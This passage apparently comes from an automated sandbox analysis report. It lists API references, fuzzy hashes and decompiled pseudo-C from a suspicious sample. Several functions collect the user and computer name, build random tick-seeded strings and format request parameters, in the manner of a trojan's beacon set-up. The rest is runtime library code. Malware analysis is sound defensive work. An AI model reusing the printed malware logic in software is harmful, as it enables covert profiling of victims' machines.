                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 030310A7
                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0303110F
                                                                                                              • Part of subcall function 030334C7: GetProcAddress.KERNEL32(36776F57,03035B13), ref: 030334E2
                                                                                                            • CloseHandle.KERNEL32(00000000,00000001), ref: 030310EC
                                                                                                            • CloseHandle.KERNEL32(?), ref: 030310F1
                                                                                                            • GetLastError.KERNEL32(00000001), ref: 030310F5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                            • String ID: Uxt$@MxtNxt
                                                                                                            • API String ID: 3075724336-2342693527
                                                                                                            • Opcode ID: 71a6f915bddbf229e17b7284e243107610a33867efd1271f3ac0269edb924610
                                                                                                            • Instruction ID: b720c8c14a039d94ffd1b555cb524f82f065412b6895f82f65fdd2ed29e0ca5e
                                                                                                            • Opcode Fuzzy Hash: 71a6f915bddbf229e17b7284e243107610a33867efd1271f3ac0269edb924610
                                                                                                            • Instruction Fuzzy Hash: F2313CB6902208BFDB21EFE4CD88EDEBBBCEB49344F144565E605E7110D734A955CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 27%
                                                                                                            			E03035F64(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				long _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				signed int _v24;
                                                                                                            				void* __esi;
                                                                                                            				long _t43;
                                                                                                            				intOrPtr _t44;
                                                                                                            				intOrPtr _t46;
                                                                                                            				void* _t48;
                                                                                                            				void* _t49;
                                                                                                            				void* _t50;
                                                                                                            				intOrPtr _t54;
                                                                                                            				intOrPtr _t57;
                                                                                                            				void* _t58;
                                                                                                            				void* _t59;
                                                                                                            				void* _t60;
                                                                                                            				intOrPtr _t66;
                                                                                                            				void* _t71;
                                                                                                            				void* _t74;
                                                                                                            				intOrPtr _t75;
                                                                                                            				void* _t77;
                                                                                                            				intOrPtr _t79;
                                                                                                            				intOrPtr* _t80;
                                                                                                            				intOrPtr _t91;
                                                                                                            
                                                                                                            				_t79 =  *0x303d37c; // 0x5319818
                                                                                                            				_v24 = 8;
                                                                                                            				_t43 = GetTickCount();
                                                                                                            				_push(5);
                                                                                                            				_t74 = 0xa;
                                                                                                            				_v16 = _t43;
                                                                                                            				_t44 = E03033A69(_t74,  &_v16);
                                                                                                            				_v8 = _t44;
                                                                                                            				if(_t44 == 0) {
                                                                                                            					_v8 = 0x303c1ac;
                                                                                                            				}
                                                                                                            				_t46 = E030351DA(_t79);
                                                                                                            				_v12 = _t46;
                                                                                                            				if(_t46 != 0) {
                                                                                                            					_t80 = __imp__;
                                                                                                            					_t48 =  *_t80(_v8, _t71);
                                                                                                            					_t49 =  *_t80(_v12);
                                                                                                            					_t50 =  *_t80(_a4);
                                                                                                            					_t54 = E030375F6(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                                                                            					_v20 = _t54;
                                                                                                            					if(_t54 != 0) {
                                                                                                            						_t75 =  *0x303d2e0; // 0x22da5a8
                                                                                                            						_t16 = _t75 + 0x303eb10; // 0x530025
                                                                                                            						 *0x303d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                                                                            						_push(4);
                                                                                                            						_t77 = 5;
                                                                                                            						_t57 = E03033A69(_t77,  &_v16);
                                                                                                            						_v8 = _t57;
                                                                                                            						if(_t57 == 0) {
                                                                                                            							_v8 = 0x303c1b0;
                                                                                                            						}
                                                                                                            						_t58 =  *_t80(_v8);
                                                                                                            						_t59 =  *_t80(_v12);
                                                                                                            						_t60 =  *_t80(_a4);
                                                                                                            						_t91 = E030375F6(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                                                                            						if(_t91 == 0) {
                                                                                                            							E03034AAB(_v20);
                                                                                                            						} else {
                                                                                                            							_t66 =  *0x303d2e0; // 0x22da5a8
                                                                                                            							_t31 = _t66 + 0x303ec30; // 0x73006d
                                                                                                            							 *0x303d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                                                                            							 *_a16 = _v20;
                                                                                                            							_v24 = _v24 & 0x00000000;
                                                                                                            							 *_a20 = _t91;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					E03034AAB(_v12);
                                                                                                            				}
                                                                                                            				return _v24;
                                                                                                            			}





























                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 03035F79
                                                                                                            • lstrlen.KERNEL32(?,80000002,00000005), ref: 03035FB9
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 03035FC2
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 03035FC9
                                                                                                            • lstrlenW.KERNEL32(80000002), ref: 03035FD6
                                                                                                            • lstrlen.KERNEL32(?,00000004), ref: 03036036
                                                                                                            • lstrlen.KERNEL32(?), ref: 0303603F
                                                                                                            • lstrlen.KERNEL32(?), ref: 03036046
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0303604D
                                                                                                              • Part of subcall function 03034AAB: RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CountFreeHeapTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 2535036572-0
                                                                                                            • Opcode ID: 64333e3bc69d4c85ffa8e2bc2f20046aed5d32a51be1e7c666729fd7fc32ba73
                                                                                                            • Instruction ID: e55ef2cf854ab95f6c1e58f89c355e938246fccb497623e7f9a09fd286bf59e4
                                                                                                            • Opcode Fuzzy Hash: 64333e3bc69d4c85ffa8e2bc2f20046aed5d32a51be1e7c666729fd7fc32ba73
                                                                                                            • Instruction Fuzzy Hash: 3E416A76902209FBCF11EFA8CC45ADEBBB9EF45344F054055EE00AB211D736DA11EB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • _free.LIBCMT ref: 6F0932BF
                                                                                                            • _free.LIBCMT ref: 6F0932D8
                                                                                                            • _free.LIBCMT ref: 6F093316
                                                                                                            • _free.LIBCMT ref: 6F09331F
                                                                                                            • _free.LIBCMT ref: 6F09332B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorLast
                                                                                                            • String ID: C
                                                                                                            • API String ID: 3291180501-1037565863
                                                                                                            • Opcode ID: d928ab485b118a04e9c1d804d805c0b22d21ed92eb95f29d1e8a2c1168005cab
                                                                                                            • Instruction ID: 140a03c877b8ae2763e99a5afeb4eb023bef63c25f0ca63de64be793181158f9
                                                                                                            • Opcode Fuzzy Hash: d928ab485b118a04e9c1d804d805c0b22d21ed92eb95f29d1e8a2c1168005cab
                                                                                                            • Instruction Fuzzy Hash: DDC14A75A012199BDB24CF28C995B9DB7F8FF49304F5085AAE84DA7390E731AE90DF40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0303137A() {
                                                                                                            				long _v8;
                                                                                                            				long _v12;
                                                                                                            				int _v16;
                                                                                                            				long _t39;
                                                                                                            				long _t43;
                                                                                                            				signed int _t47;
                                                                                                            				short _t51;
                                                                                                            				signed int _t52;
                                                                                                            				int _t56;
                                                                                                            				int _t57;
                                                                                                            				char* _t64;
                                                                                                            				short* _t67;
                                                                                                            
                                                                                                            				_v16 = 0;
                                                                                                            				_v8 = 0;
                                                                                                            				GetUserNameW(0,  &_v8);
                                                                                                            				_t39 = _v8;
                                                                                                            				if(_t39 != 0) {
                                                                                                            					_v12 = _t39;
                                                                                                            					_v8 = 0;
                                                                                                            					GetComputerNameW(0,  &_v8);
                                                                                                            					_t43 = _v8;
                                                                                                            					if(_t43 != 0) {
                                                                                                            						_v12 = _v12 + _t43 + 2;
                                                                                                            						_t64 = E030375F6(_v12 + _t43 + 2 << 2);
                                                                                                            						if(_t64 != 0) {
                                                                                                            							_t47 = _v12;
                                                                                                            							_t67 = _t64 + _t47 * 2;
                                                                                                            							_v8 = _t47;
                                                                                                            							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                                                                            								L7:
                                                                                                            								E03034AAB(_t64);
                                                                                                            							} else {
                                                                                                            								_t51 = 0x40;
                                                                                                            								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                                                                            								_t52 = _v8;
                                                                                                            								_v12 = _v12 - _t52;
                                                                                                            								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                                                                            									goto L7;
                                                                                                            								} else {
                                                                                                            									_t56 = _v12 + _v8;
                                                                                                            									_t31 = _t56 + 2; // 0x3034565
                                                                                                            									_v12 = _t56;
                                                                                                            									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                                                                            									_v8 = _t57;
                                                                                                            									if(_t57 == 0) {
                                                                                                            										goto L7;
                                                                                                            									} else {
                                                                                                            										_t64[_t57] = 0;
                                                                                                            										_v16 = _t64;
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _v16;
                                                                                                            			}















                                                                                                            0x03031437
                                                                                                            0x0303143a
                                                                                                            0x0303143a
                                                                                                            0x03031435
                                                                                                            0x0303140f
                                                                                                            0x03031445
                                                                                                            0x03031446
                                                                                                            0x030313b5
                                                                                                            0x0303144c

                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(00000000,03034563), ref: 0303138E
                                                                                                            • GetComputerNameW.KERNEL32(00000000,03034563), ref: 030313AA
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • GetUserNameW.ADVAPI32(00000000,03034563), ref: 030313E4
                                                                                                            • GetComputerNameW.KERNEL32(03034563,?), ref: 03031407
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,03034563,00000000,03034565,00000000,00000000,?,?,03034563), ref: 0303142A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                            • String ID: @hxt
                                                                                                            • API String ID: 3850880919-1276795746
                                                                                                            • Opcode ID: 8a3afec233eb1d9ab54cea01d45e97406e0c7662b83faafae332d195c7e16c73
                                                                                                            • Instruction ID: fa03e08e9113a7b3a23ad0587533c95450ef2bd2f033f79a17c6e4747d302749
                                                                                                            • Opcode Fuzzy Hash: 8a3afec233eb1d9ab54cea01d45e97406e0c7662b83faafae332d195c7e16c73
                                                                                                            • Instruction Fuzzy Hash: E321F976901248FFDB15EFE9C984DEEBBBDEF49200B5444AAE501E7200EB349B45DB21
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 63%
                                                                                                            			E03031974(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _t9;
                                                                                                            				intOrPtr _t13;
                                                                                                            				char* _t28;
                                                                                                            				void* _t33;
                                                                                                            				void* _t34;
                                                                                                            				char* _t36;
                                                                                                            				intOrPtr* _t40;
                                                                                                            				char* _t41;
                                                                                                            				char* _t42;
                                                                                                            				char* _t43;
                                                                                                            
                                                                                                            				_t34 = __edx;
                                                                                                            				_push(__ecx);
                                                                                                            				_t9 =  *0x303d2e0; // 0x22da5a8
                                                                                                            				_t1 = _t9 + 0x303e62c; // 0x253d7325
                                                                                                            				_t36 = 0;
                                                                                                            				_t28 = E030343A8(__ecx, _t1);
                                                                                                            				if(_t28 != 0) {
                                                                                                            					_t40 = __imp__;
                                                                                                            					_t13 =  *_t40(_t28);
                                                                                                            					_v8 = _t13;
                                                                                                            					_t41 = E030375F6(_v8 +  *_t40(_a4) + 1);
                                                                                                            					if(_t41 != 0) {
                                                                                                            						strcpy(_t41, _t28);
                                                                                                            						_pop(_t33);
                                                                                                            						__imp__(_t41, _a4);
                                                                                                            						_t36 = E03035601(_t34, _t41, _a8);
                                                                                                            						E03034AAB(_t41);
                                                                                                            						_t42 = E0303756E(StrTrimA(_t36, "="), _t36);
                                                                                                            						if(_t42 != 0) {
                                                                                                            							E03034AAB(_t36);
                                                                                                            							_t36 = _t42;
                                                                                                            						}
                                                                                                            						_t43 = E030326DD(_t36, _t33);
                                                                                                            						if(_t43 != 0) {
                                                                                                            							E03034AAB(_t36);
                                                                                                            							_t36 = _t43;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					E03034AAB(_t28);
                                                                                                            				}
                                                                                                            				return _t36;
                                                                                                            			}















                                                                                                            APIs
                                                                                                              • Part of subcall function 030343A8: lstrlen.KERNEL32(00000000,00000000,00000000,770CC740,?,?,?,0303198E,253D7325,00000000,00000000,770CC740,?,?,03034653,?), ref: 0303440F
                                                                                                              • Part of subcall function 030343A8: sprintf.NTDLL ref: 03034430
                                                                                                            • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,03034653,?,053195B0), ref: 0303199F
                                                                                                            • lstrlen.KERNEL32(?,?,?,03034653,?,053195B0), ref: 030319A7
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • strcpy.NTDLL ref: 030319BE
                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 030319C9
                                                                                                              • Part of subcall function 03035601: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,030319D8,00000000,?,?,?,03034653,?,053195B0), ref: 03035618
                                                                                                              • Part of subcall function 03034AAB: RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,03034653,?,053195B0), ref: 030319E6
                                                                                                              • Part of subcall function 0303756E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,030319F2,00000000,?,?,03034653,?,053195B0), ref: 03037578
                                                                                                              • Part of subcall function 0303756E: _snprintf.NTDLL ref: 030375D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                            • String ID: =
                                                                                                            • API String ID: 2864389247-1428090586
                                                                                                            • Opcode ID: d4013413b609a35b72db750eeb352dc909a2dbf99ebf710b32593d5d4aeb3f02
                                                                                                            • Instruction ID: 6902b060b34d1e69e5d5d8f9b8524763c78a7928a91b626417d950ef6705f561
                                                                                                            • Opcode Fuzzy Hash: d4013413b609a35b72db750eeb352dc909a2dbf99ebf710b32593d5d4aeb3f02
                                                                                                            • Instruction Fuzzy Hash: 4911A03B513B247B8612F7A59C84CEE67ED9ECB6A03094025FA01AF200DE38C90287A4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065688
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065692
                                                                                                            • int.LIBCPMT ref: 6F0656A9
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0656E3
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065703
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065710
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06571D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 3920336645-0
                                                                                                            • Opcode ID: a15cc81070a22cf4bd7867f48526b46e6bc097b65eeb3781431eb724a0c1ae73
                                                                                                            • Instruction ID: 14f898f53643ffd12c7355212039c740929d5f6069663ffd3f7648b3cce13b42
                                                                                                            • Opcode Fuzzy Hash: a15cc81070a22cf4bd7867f48526b46e6bc097b65eeb3781431eb724a0c1ae73
                                                                                                            • Instruction Fuzzy Hash: 2221D275904729DBCF12DFA4CA447BEBBB2BF45728F644509E8146B3C1CBB09A11CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F09D196: _free.LIBCMT ref: 6F09D1BB
                                                                                                            • _free.LIBCMT ref: 6F09D4F9
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09D504
                                                                                                            • _free.LIBCMT ref: 6F09D50F
                                                                                                            • _free.LIBCMT ref: 6F09D563
                                                                                                            • _free.LIBCMT ref: 6F09D56E
                                                                                                            • _free.LIBCMT ref: 6F09D579
                                                                                                            • _free.LIBCMT ref: 6F09D584
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                            • Instruction ID: 00fd5a655ef350daad25bf58c216a07a86bcd47fff65a1c165316015cb0849cd
                                                                                                            • Opcode Fuzzy Hash: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                            • Instruction Fuzzy Hash: 6E118432582B05B6EB21AB70DC15FCB77AE5F04788F405915E2E9670D1F734B505A760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06555E
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065568
                                                                                                            • int.LIBCPMT ref: 6F06557F
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F0655A2
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0655B9
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0655D9
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0655E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: 82a4d11eb1b3109ef3482a49506c1f3a633d6e9f55916059a67c8d14a1f3a0ec
                                                                                                            • Instruction ID: 826464c08333a62bf2303974e91dc2eb45b5aa4834feafb2aa3ec9c39f4052f0
                                                                                                            • Opcode Fuzzy Hash: 82a4d11eb1b3109ef3482a49506c1f3a633d6e9f55916059a67c8d14a1f3a0ec
                                                                                                            • Instruction Fuzzy Hash: 8F01F53A904729DBCF05DBA8CA547BD77B2BF85368F240509E4116B3C1DFB4AA52CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0654C9
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0654D3
                                                                                                            • int.LIBCPMT ref: 6F0654EA
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F06550D
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F065524
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065544
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065551
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: 7f5efa1ec43b459f97a789edfc51d6b2168b44ae7cd35aa9052db226b29c08a6
                                                                                                            • Instruction ID: 9f070d5edea40ddc154b5beeb207c4d746b677adeb816319792b3fca2be7afcb
                                                                                                            • Opcode Fuzzy Hash: 7f5efa1ec43b459f97a789edfc51d6b2168b44ae7cd35aa9052db226b29c08a6
                                                                                                            • Instruction Fuzzy Hash: 7D01D639900625DBCF05DBA8CA547BD77B2AF45328F240409D8116B3C1DFB0D955CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06530A
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065314
                                                                                                            • int.LIBCPMT ref: 6F06532B
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • messages.LIBCPMT ref: 6F06534E
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F065365
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065385
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065392
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                            • String ID:
                                                                                                            • API String ID: 958335874-0
                                                                                                            • Opcode ID: 66ba1d9f3965d7129c39076002f0efdb2bad12e8e6cd4a5a7a5c5d49088ef6b6
                                                                                                            • Instruction ID: c53367e5da18076c775b8cc2f6761c4e97f8ed00adfcba9b3de2d9db95452efa
                                                                                                            • Opcode Fuzzy Hash: 66ba1d9f3965d7129c39076002f0efdb2bad12e8e6cd4a5a7a5c5d49088ef6b6
                                                                                                            • Instruction Fuzzy Hash: 1101D635900625DBCF05DBA4CA407BDB7B2BF45728F244509E4116B2D1DFB0DE16CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065275
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F06527F
                                                                                                            • int.LIBCPMT ref: 6F065296
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • collate.LIBCPMT ref: 6F0652B9
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0652D0
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0652F0
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0652FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1767075461-0
                                                                                                            • Opcode ID: 4b1241b8bc4c35a26273466b66544aaa571e5da99d2668c6172e9ac88528fb8f
                                                                                                            • Instruction ID: bfba6a3835b7de6a82e11b8b7b866dc6816a335474f9b64537e95858fe8f70e9
                                                                                                            • Opcode Fuzzy Hash: 4b1241b8bc4c35a26273466b66544aaa571e5da99d2668c6172e9ac88528fb8f
                                                                                                            • Instruction Fuzzy Hash: 5B01D23590062A9BCF05DBA8CA41BBD77B2BF8532CF640509D4116B2D1DFB0AD568B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03031A24(intOrPtr _a4) {
                                                                                                            				void* _t2;
                                                                                                            				unsigned int _t4;
                                                                                                            				void* _t5;
                                                                                                            				long _t6;
                                                                                                            				void* _t7;
                                                                                                            				void* _t15;
                                                                                                            
                                                                                                            				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                            				 *0x303d2a4 = _t2;
                                                                                                            				if(_t2 == 0) {
                                                                                                            					return GetLastError();
                                                                                                            				}
                                                                                                            				_t4 = GetVersion();
                                                                                                            				if(_t4 != 5) {
                                                                                                            					L4:
                                                                                                            					if(_t15 <= 0) {
                                                                                                            						_t5 = 0x32;
                                                                                                            						return _t5;
                                                                                                            					}
                                                                                                            					L5:
                                                                                                            					 *0x303d294 = _t4;
                                                                                                            					_t6 = GetCurrentProcessId();
                                                                                                            					 *0x303d290 = _t6;
                                                                                                            					 *0x303d29c = _a4;
                                                                                                            					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                            					 *0x303d28c = _t7;
                                                                                                            					if(_t7 == 0) {
                                                                                                            						 *0x303d28c =  *0x303d28c | 0xffffffff;
                                                                                                            					}
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				if(_t4 >> 8 > 0) {
                                                                                                            					goto L5;
                                                                                                            				}
                                                                                                            				_t15 = _t4 - _t4;
                                                                                                            				goto L4;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03032669,?,?,00000001,?,?,?,03031900,?), ref: 03031A2C
                                                                                                            • GetVersion.KERNEL32(?,00000001,?,?,?,03031900,?), ref: 03031A3B
